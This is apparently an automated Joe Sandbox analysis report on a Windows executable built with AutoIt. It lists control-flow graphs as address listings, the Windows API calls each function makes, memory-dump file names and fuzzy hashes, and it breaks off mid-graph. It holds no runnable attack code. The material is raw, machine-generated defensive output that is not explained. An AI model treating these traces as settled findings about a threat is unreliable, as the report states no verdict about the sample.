                                                                      control_flow_graph 719 7ff6439bf630-7ff6439bf69e call 7ff643946240 722 7ff6439bf6a0-7ff6439bf6b8 call 7ff64392ffbc 719->722 723 7ff6439bf6d4-7ff6439bf6d9 719->723 731 7ff6439bf708-7ff6439bf70d 722->731 732 7ff6439bf6ba-7ff6439bf6d2 call 7ff64392ffbc 722->732 724 7ff6439bf71e-7ff6439bf723 723->724 725 7ff6439bf6db-7ff6439bf6ef call 7ff64392ffbc 723->725 728 7ff6439bf725-7ff6439bf729 724->728 729 7ff6439bf736-7ff6439bf75c call 7ff64392d4cc call 7ff64392e330 724->729 739 7ff6439bf6f3-7ff6439bf706 call 7ff64392ffbc 725->739 735 7ff6439bf72d-7ff6439bf732 call 7ff64392ffbc 728->735 748 7ff6439bf840-7ff6439bf84a 729->748 749 7ff6439bf762-7ff6439bf7cf call 7ff64392d4cc call 7ff64392e330 call 7ff64392d4cc call 7ff64392e330 call 7ff64392d4cc call 7ff64392e330 729->749 740 7ff6439bf70f-7ff6439bf717 731->740 741 7ff6439bf719-7ff6439bf71c 731->741 732->739 735->729 739->724 739->731 740->735 741->724 741->729 750 7ff6439bf87d-7ff6439bf8af GetCurrentDirectoryW call 7ff643944c68 GetCurrentDirectoryW 748->750 751 7ff6439bf84c-7ff6439bf86e call 7ff64392d4cc call 7ff64392e330 748->751 798 7ff6439bf7d1-7ff6439bf7f3 call 7ff64392d4cc call 7ff64392e330 749->798 799 7ff6439bf806-7ff6439bf83e GetSystemDirectoryW call 7ff643944c68 GetSystemDirectoryW 749->799 760 7ff6439bf8b5-7ff6439bf8b8 750->760 751->750 767 7ff6439bf870-7ff6439bf87b call 7ff643948d58 751->767 763 7ff6439bf8f0-7ff6439bf8ff call 7ff64399f464 760->763 764 7ff6439bf8ba-7ff6439bf8eb call 7ff64393f688 * 3 760->764 774 7ff6439bf901-7ff6439bf903 763->774 775 7ff6439bf905-7ff6439bf95d call 7ff64399fddc call 7ff64399fca8 call 7ff64399fafc 763->775 764->763 767->750 767->763 781 7ff6439bf964-7ff6439bf96c 774->781 775->781 809 7ff6439bf95f 775->809 786 7ff6439bfa0f-7ff6439bfa4b CreateProcessW 781->786 787 7ff6439bf972-7ff6439bfa0d call 7ff64398d1f8 call 7ff643948d58 * 3 call 7ff643944c24 * 3 781->787 791 7ff6439bfa4f-7ff6439bfa62 call 7ff643944c24 * 2 786->791 787->791 811 7ff6439bfabe-7ff6439bfaca CloseHandle 791->811 812 7ff6439bfa64-7ff6439bfabc call 7ff643924afc * 2 GetLastError call 7ff64393f214 call 7ff6439313e0 791->812 798->799 824 7ff6439bf7f5-7ff6439bf800 call 7ff643948d58 798->824 799->760 809->781 818 7ff6439bfaf5-7ff6439bfafc 811->818 819 7ff6439bfacc-7ff6439bfaf0 call 7ff64399f7dc call 7ff6439a0088 call 7ff6439bfb68 811->819 827 7ff6439bfb3b-7ff6439bfb65 call 7ff64399f51c 812->827 820 7ff6439bfafe-7ff6439bfb0a 818->820 821 7ff6439bfb0c-7ff6439bfb35 call 7ff6439313e0 CloseHandle 818->821 819->818 820->827 821->827 824->760 824->799
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 1787492119-0
                                                                      • Opcode ID: e2a7c1d8124437b582cfb658b2d177abad3ac019b1a970ee0b5f7319356aeb95
                                                                      • Instruction ID: 4133de334e8f463ba58a54aeb9960e4f757eecf46ea6ab0e36e5ba4eea7f095e
                                                                      • Opcode Fuzzy Hash: e2a7c1d8124437b582cfb658b2d177abad3ac019b1a970ee0b5f7319356aeb95
                                                                      • Instruction Fuzzy Hash: 2CE19022A0CB4186EB14FF26D5521BD67A0FB84B88F044535DE5EEB7AAEF38E405D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction ID: fd498619a594fe09b4f13275761684c6b3613df363868a8ce82e67661ca2f5cf
                                                                      • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction Fuzzy Hash: 7DF05E90E0C602C2EA64BB25AC0B3386260AF51BB6F544330D47ED66E5EF6C94986B00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                      • API String ID: 2667193904-1575078665
                                                                      • Opcode ID: f9406fba147e09617d77f46eeb912367f4a34daf77c80b7912a24e0bdb708ac2
                                                                      • Instruction ID: e56dffd417b00d821f73c21a3353a6f52d0075a184d6bb289e3bf3d7918431d1
                                                                      • Opcode Fuzzy Hash: f9406fba147e09617d77f46eeb912367f4a34daf77c80b7912a24e0bdb708ac2
                                                                      • Instruction Fuzzy Hash: EE916E32A1CA8685EB20FB24E8421BD7364FF94784F801136E54CE3AA6EF7CE145E750

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 131 7ff643925dec-7ff643925e21 133 7ff643925e91-7ff643925e94 131->133 134 7ff643925e23-7ff643925e26 131->134 133->134 137 7ff643925e96 133->137 135 7ff643925e98 134->135 136 7ff643925e28-7ff643925e2f 134->136 138 7ff64396c229-7ff64396c261 call 7ff64393ede4 call 7ff643942c44 135->138 139 7ff643925e9e-7ff643925ea3 135->139 140 7ff643925f21-7ff643925f29 PostQuitMessage 136->140 141 7ff643925e35-7ff643925e3a 136->141 142 7ff643925e6b-7ff643925e76 DefWindowProcW 137->142 178 7ff64396c267-7ff64396c26e 138->178 143 7ff643925ecc-7ff643925efa SetTimer RegisterWindowMessageW 139->143 144 7ff643925ea5-7ff643925ea8 139->144 149 7ff643925ec8-7ff643925eca 140->149 145 7ff643925e40-7ff643925e43 141->145 146 7ff64396c2af-7ff64396c2c5 call 7ff64399a40c 141->146 148 7ff643925e7c-7ff643925e90 142->148 143->149 152 7ff643925efc-7ff643925f09 CreatePopupMenu 143->152 150 7ff64396c1b8-7ff64396c1bb 144->150 151 7ff643925eae-7ff643925ebe KillTimer call 7ff643925d88 144->151 153 7ff643925e49-7ff643925e4e 145->153 154 7ff643925f2b-7ff643925f35 call 7ff643944610 145->154 146->149 171 7ff64396c2cb 146->171 149->148 157 7ff64396c1bd-7ff64396c1c0 150->157 158 7ff64396c1f7-7ff64396c224 MoveWindow 150->158 167 7ff643925ec3 call 7ff643927098 151->167 152->149 160 7ff64396c292-7ff64396c299 153->160 161 7ff643925e54-7ff643925e59 153->161 173 7ff643925f3a 154->173 165 7ff64396c1e4-7ff64396c1f2 SetFocus 157->165 166 7ff64396c1c2-7ff64396c1c5 157->166 158->149 160->142 168 7ff64396c29f-7ff64396c2aa call 7ff64398c54c 160->168 169 7ff643925f0b-7ff643925f1f call 7ff643925f3c 161->169 170 7ff643925e5f-7ff643925e65 161->170 165->149 166->170 174 7ff64396c1cb-7ff64396c1df call 7ff64393ede4 166->174 167->149 168->142 169->149 170->142 170->178 171->142 173->149 174->149 178->142 182 7ff64396c274-7ff64396c28d call 7ff643925d88 call 7ff643926258 178->182 182->142
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction ID: 7a60895c587b6a3c63cedddf432d9e9db3f2fe2c1c06c200787e155ea82c05af
                                                                      • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction Fuzzy Hash: CD51AD31D4CA5391FAA0BB24EA472B9AA50AF55B40F440831E44EF26E7EF6CF544BB14

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-2659433951
                                                                      • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                      • Instruction ID: ead6d56a329875b81292e1a3a3b93aa66c6fd5607e460bfe45387d06312ffd59
                                                                      • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                      • Instruction Fuzzy Hash: BA314736A08B119AF740EF61E8463A93BB4FB54748F500139CA8DA7B64EF7CD198DB50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 189 7ff64393e958-7ff64393e9ae 190 7ff6439827e4-7ff6439827ea DestroyWindow 189->190 191 7ff64393e9b4-7ff64393e9d3 mciSendStringW 189->191 194 7ff6439827f0-7ff643982801 190->194 192 7ff64393e9d9-7ff64393e9e3 191->192 193 7ff64393ecbd-7ff64393ecce 191->193 192->194 197 7ff64393e9e9 192->197 195 7ff64393ecf7-7ff64393ed01 193->195 196 7ff64393ecd0-7ff64393ecf0 UnregisterHotKey 193->196 199 7ff643982835-7ff64398283f 194->199 200 7ff643982803-7ff643982806 194->200 195->192 202 7ff64393ed07 195->202 196->195 201 7ff64393ecf2 call 7ff64393f270 196->201 198 7ff64393e9f0-7ff64393e9f3 197->198 203 7ff64393e9f9-7ff64393ea08 call 7ff643923aa8 198->203 204 7ff64393ecb0-7ff64393ecb8 call 7ff643925410 198->204 199->194 208 7ff643982841 199->208 205 7ff643982808-7ff643982811 call 7ff643928314 200->205 206 7ff643982813-7ff643982817 FindClose 200->206 201->195 202->193 218 7ff64393ea0f-7ff64393ea12 203->218 204->198 211 7ff64398281d-7ff64398282e 205->211 206->211 217 7ff643982846-7ff64398284f call 7ff6439b8c00 208->217 211->199 216 7ff643982830 call 7ff6439a3180 211->216 216->199 217->218 218->217 221 7ff64393ea18 218->221 223 7ff64393ea1f-7ff64393ea22 221->223 224 7ff64393ea28-7ff64393ea32 223->224 225 7ff643982854-7ff64398285d call 7ff6439946cc 223->225 227 7ff64393ea38-7ff64393ea42 224->227 228 7ff643982862-7ff643982873 224->228 225->223 232 7ff64398288c-7ff64398289d 227->232 233 7ff64393ea48-7ff64393ea76 call 7ff6439313e0 227->233 230 7ff64398287b-7ff643982885 228->230 231 7ff643982875 FreeLibrary 228->231 230->228 234 7ff643982887 230->234 231->230 235 7ff6439828c9-7ff6439828d3 232->235 236 7ff64398289f-7ff6439828c2 VirtualFree 232->236 242 7ff64393ea78 233->242 243 7ff64393eabf-7ff64393eacc OleUninitialize 233->243 234->232 235->232 240 7ff6439828d5 235->240 236->235 238 7ff6439828c4 call 7ff6439a321c 236->238 238->235 244 7ff6439828da-7ff6439828de 240->244 246 7ff64393ea7d-7ff64393eabd call 7ff64393f1c4 call 7ff64393f13c 242->246 243->244 245 7ff64393ead2-7ff64393ead9 243->245 244->245 247 7ff6439828e4-7ff6439828ef 244->247 248 7ff6439828f4-7ff643982903 call 7ff6439a31d4 245->248 249 7ff64393eadf-7ff64393eaea 245->249 246->243 247->245 261 7ff643982905 248->261 252 7ff64393ed09-7ff64393ed18 call 7ff6439442a0 249->252 253 7ff64393eaf0-7ff64393eb22 call 7ff64392a07c call 7ff64393f08c call 7ff6439239bc 249->253 252->253 265 7ff64393ed1e 252->265 273 7ff64393eb2e-7ff64393ebc4 call 7ff6439239bc call 7ff64392a07c call 7ff6439245c8 * 2 call 7ff64392a07c * 3 call 7ff6439313e0 call 7ff64393ee68 call 7ff64393ee2c * 3 253->273 274 7ff64393eb24-7ff64393eb29 call 7ff643944c24 253->274 266 7ff64398290a-7ff643982919 call 7ff643993a78 261->266 265->252 272 7ff64398291b 266->272 278 7ff643982920-7ff64398292f call 7ff64393e4e4 272->278 273->266 316 7ff64393ebca-7ff64393ebdc call 7ff6439239bc 273->316 274->273 283 7ff643982931 278->283 286 7ff643982936-7ff643982945 call 7ff6439a3078 283->286 292 7ff643982947 286->292 295 7ff64398294c-7ff64398295b call 7ff6439a31a8 292->295 301 7ff64398295d 295->301 304 7ff643982962-7ff643982971 call 7ff6439a31a8 301->304 311 7ff643982973 304->311 311->311 316->278 319 7ff64393ebe2-7ff64393ebec 316->319 319->286 320 7ff64393ebf2-7ff64393ec08 call 7ff64392a07c 319->320 323 7ff64393ed20-7ff64393ed25 call 7ff643944c24 320->323 324 7ff64393ec0e-7ff64393ec18 320->324 323->190 326 7ff64393ec8a-7ff64393eca9 call 7ff64392a07c call 7ff643944c24 324->326 327 7ff64393ec1a-7ff64393ec24 324->327 338 7ff64393ecab 326->338 327->295 328 7ff64393ec2a-7ff64393ec3b 327->328 328->304 331 7ff64393ec41-7ff64393ed71 call 7ff64392a07c * 3 call 7ff64393ee10 call 7ff64393ed8c 328->331 347 7ff64393ed77-7ff64393ed88 331->347 348 7ff643982978-7ff643982987 call 7ff6439ad794 331->348 338->327 351 7ff643982989 348->351 351->351
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                      • String ID: close all
                                                                      • API String ID: 1992507300-3243417748
                                                                      • Opcode ID: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                      • Instruction ID: 4cdb6c70b64b27ea63cae51b52f50e3f842f0b5dfdc31210bb3fe7e46aba2f26
                                                                      • Opcode Fuzzy Hash: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                      • Instruction Fuzzy Hash: 5BE11D66B1D94281EE58FB16C5522BC2360BF98B44F544435DB4EF7693EF3CE862A700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: AutoIt v3
                                                                      • API String ID: 423443420-1704141276
                                                                      • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                      • Instruction ID: e890a1be08c59c0454af252d41e8b3cf4d9c8f2dfb129aebe1bdfc8ace54e386
                                                                      • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                      • Instruction Fuzzy Hash: C0311636A0CB12DAEB40FB91F8863A93774BB88755F044439C98DA3B15EF7CD094A750

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 419 7ff643967348-7ff6439673ba call 7ff643967078 422 7ff6439673bc-7ff6439673c4 call 7ff6439555b4 419->422 423 7ff6439673d3-7ff6439673dd call 7ff64395e418 419->423 428 7ff6439673c7-7ff6439673ce call 7ff6439555d4 422->428 429 7ff6439673f7-7ff643967463 CreateFileW 423->429 430 7ff6439673df-7ff6439673f5 call 7ff6439555b4 call 7ff6439555d4 423->430 443 7ff64396771a-7ff643967736 428->443 431 7ff6439674eb-7ff6439674f6 GetFileType 429->431 432 7ff643967469-7ff643967470 429->432 430->428 438 7ff643967549-7ff64396754f 431->438 439 7ff6439674f8-7ff643967533 GetLastError call 7ff643955564 CloseHandle 431->439 435 7ff6439674b8-7ff6439674e6 GetLastError call 7ff643955564 432->435 436 7ff643967472-7ff643967476 432->436 435->428 436->435 441 7ff643967478-7ff6439674b6 CreateFileW 436->441 446 7ff643967556-7ff643967559 438->446 447 7ff643967551-7ff643967554 438->447 439->428 454 7ff643967539-7ff643967544 call 7ff6439555d4 439->454 441->431 441->435 448 7ff64396755e-7ff6439675ac call 7ff64395e334 446->448 449 7ff64396755b 446->449 447->448 457 7ff6439675ae-7ff6439675ba call 7ff643967284 448->457 458 7ff6439675c0-7ff6439675ea call 7ff643966de4 448->458 449->448 454->428 464 7ff6439675bc 457->464 465 7ff6439675ef-7ff6439675f9 call 7ff6439604b8 457->465 466 7ff6439675ec 458->466 467 7ff6439675fe-7ff643967643 458->467 464->458 465->443 466->465 468 7ff643967665-7ff643967671 467->468 469 7ff643967645-7ff643967649 467->469 472 7ff643967677-7ff64396767b 468->472 473 7ff643967718 468->473 469->468 471 7ff64396764b-7ff643967660 469->471 471->468 472->473 475 7ff643967681-7ff6439676c9 CloseHandle CreateFileW 472->475 473->443 476 7ff6439676cb-7ff6439676f9 GetLastError call 7ff643955564 call 7ff64395e548 475->476 477 7ff6439676fe-7ff643967713 475->477 476->477 477->473
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                      • String ID:
                                                                      • API String ID: 1617910340-0
                                                                      • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                      • Instruction ID: 7eccb504166c912c9f91a872712328b4fb72a37eecef12a76cf7ee68fba7279e
                                                                      • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                      • Instruction Fuzzy Hash: D0C1D033B19A418AEB50EF64D4823AC3761E749BA8F005235DE2EEB796EF38D055D740

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 557 7ff6439325bc-7ff64393263d 561 7ff64393287e-7ff6439328af 557->561 562 7ff643932643-7ff64393267c 557->562 563 7ff643932680-7ff643932687 562->563 565 7ff643932856-7ff643932876 563->565 566 7ff64393268d-7ff6439326a1 563->566 565->561 568 7ff6439326a7-7ff6439326bc 566->568 569 7ff64397d148-7ff64397d14f 566->569 570 7ff6439329c8-7ff6439329eb PeekMessageW 568->570 571 7ff6439326c2-7ff6439326c9 568->571 572 7ff64397d155 569->572 573 7ff643932702-7ff643932723 569->573 574 7ff6439326e8-7ff6439326ef 570->574 575 7ff6439329f1-7ff6439329f5 570->575 571->570 576 7ff6439326cf-7ff6439326d4 571->576 583 7ff64397d15a-7ff64397d160 572->583 589 7ff64393276e-7ff6439327d2 573->589 590 7ff643932725-7ff64393272c 573->590 581 7ff64397e285-7ff64397e293 574->581 582 7ff6439326f5-7ff6439326fc 574->582 578 7ff64397d1aa-7ff64397d1bb 575->578 579 7ff6439329fb-7ff643932a05 575->579 576->570 580 7ff6439326da-7ff6439326e2 GetInputState 576->580 578->574 579->583 585 7ff643932a0b-7ff643932a1d call 7ff643942de8 579->585 580->570 580->574 586 7ff64397e29d-7ff64397e2b5 call 7ff64393f1c4 581->586 582->573 582->586 587 7ff64397d19b 583->587 588 7ff64397d162-7ff64397d176 583->588 605 7ff643932a1f-7ff643932a2d TranslateMessage DispatchMessageW 585->605 606 7ff643932a33-7ff643932a4f PeekMessageW 585->606 586->565 587->578 588->587 591 7ff64397d178-7ff64397d17f 588->591 625 7ff6439327d8-7ff6439327da 589->625 626 7ff64397e276 589->626 590->589 592 7ff64393272e-7ff643932738 590->592 591->587 596 7ff64397d181-7ff64397d190 TranslateAcceleratorW 591->596 597 7ff64393273f-7ff643932742 592->597 596->585 602 7ff64397d196 596->602 603 7ff643932748 597->603 604 7ff6439328b0-7ff6439328b7 597->604 602->606 608 7ff64393274f-7ff643932752 603->608 609 7ff6439328b9-7ff6439328cc timeGetTime 604->609 610 7ff6439328eb-7ff6439328ef 604->610 605->606 606->574 611 7ff643932a55 606->611 613 7ff643932758-7ff643932761 608->613 614 7ff6439328f4-7ff6439328fb 608->614 615 7ff64397d2ab-7ff64397d2b0 609->615 616 7ff6439328d2-7ff6439328d7 609->616 610->597 611->575 618 7ff643932767 613->618 619 7ff64397d4c7-7ff64397d4ce 613->619 623 7ff64397d2f8-7ff64397d303 614->623 624 7ff643932901-7ff643932905 614->624 620 7ff6439328dc-7ff6439328e5 615->620 621 7ff64397d2b6 615->621 616->620 622 7ff6439328d9 616->622 618->589 620->610 627 7ff64397d2bb-7ff64397d2f3 timeGetTime call 7ff643942ac0 call 7ff6439a3a28 620->627 621->627 622->620 628 7ff64397d309-7ff64397d30c 623->628 629 7ff64397d305 623->629 624->608 625->626 632 7ff6439327e0-7ff6439327ee 625->632 626->581 627->610 630 7ff64397d312-7ff64397d319 628->630 631 7ff64397d30e 628->631 629->628 634 7ff64397d31b 630->634 635 7ff64397d322-7ff64397d329 630->635 631->630 632->626 636 7ff6439327f4-7ff643932819 632->636 634->635 638 7ff64397d32b 635->638 639 7ff64397d332-7ff64397d33d call 7ff6439442a0 635->639 640 7ff64393290a-7ff64393290d 636->640 641 7ff64393281f-7ff643932829 call 7ff643932b70 636->641 638->639 639->603 639->619 645 7ff643932931-7ff643932933 640->645 646 7ff64393290f-7ff64393291a call 7ff643932e30 640->646 651 7ff64393282e-7ff643932836 641->651 648 7ff643932971-7ff643932974 645->648 649 7ff643932935-7ff643932949 call 7ff6439366c0 645->649 646->651 654 7ff64393297a-7ff643932997 call 7ff6439301a0 648->654 655 7ff64397dfbe-7ff64397dfc0 648->655 659 7ff64393294e-7ff643932950 649->659 656 7ff64393283c 651->656 657 7ff64393299e-7ff6439329ab 651->657 669 7ff64393299c 654->669 661 7ff64397dfed-7ff64397dff6 655->661 662 7ff64397dfc2-7ff64397dfc5 655->662 663 7ff643932840-7ff643932843 656->663 664 7ff6439329b1-7ff6439329be call 7ff643944c24 657->664 665 7ff64397e181-7ff64397e197 call 7ff643944c24 * 2 657->665 659->651 668 7ff643932956-7ff643932966 659->668 666 7ff64397dff8-7ff64397e003 661->666 667 7ff64397e005-7ff64397e00c 661->667 662->663 671 7ff64397dfcb-7ff64397dfe7 call 7ff643933c20 662->671 672 7ff643932849-7ff643932850 663->672 673 7ff643932b17-7ff643932b1d 663->673 664->570 665->626 675 7ff64397e00f-7ff64397e016 call 7ff6439b8b98 666->675 667->675 668->651 676 7ff64393296c 668->676 669->659 671->661 672->563 672->565 673->672 677 7ff643932b23-7ff643932b2d 673->677 688 7ff64397e01c-7ff64397e036 call 7ff6439a34e4 675->688 689 7ff64397e0d7-7ff64397e0d9 675->689 682 7ff64397e0f4-7ff64397e10e call 7ff6439a34e4 676->682 677->569 694 7ff64397e147-7ff64397e14e 682->694 695 7ff64397e110-7ff64397e11d 682->695 705 7ff64397e038-7ff64397e045 688->705 706 7ff64397e06f-7ff64397e076 688->706 691 7ff64397e0db 689->691 692 7ff64397e0df-7ff64397e0ee call 7ff6439ba320 689->692 691->692 692->682 694->672 696 